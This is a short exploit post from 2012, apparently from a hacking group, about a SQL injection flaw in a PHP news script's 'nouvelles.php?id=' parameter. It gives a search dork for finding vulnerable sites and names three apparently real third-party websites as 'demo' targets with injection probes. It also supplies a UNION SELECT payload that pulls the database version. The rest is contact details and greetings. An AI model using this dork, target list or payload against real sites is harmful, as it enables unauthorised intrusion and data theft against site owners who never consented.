########################################################

~ Exploit Title: * Nouvelles SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 27.01.2012 ~ 

~ Platform : Php ~


########################################################

~ Dork: nouvelles.php?id=


########################################################

~ Demos Site :

http://www.cpasecurite.qc.ca/en/nouvelles.php?id=64'
http://www.canrep.com/nouvelles.php?id=22'
http://www.snowsuprem.eu/nouvelles.php?id=1'

Exploit : 

http://localhost/nouvelles.php?id=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/@@version,/**/3,/**/4,/**/5--


########################################################

~* Bilinmezlik Diyari

########################################################

~* Olmassa Olmazimdir. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net 
 

########################################################

TWS Family

~  Evillord,Mugair,Nikolay,Darkness Devil 
 
~ TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

######################################################## 

 Special Thanx : HancHer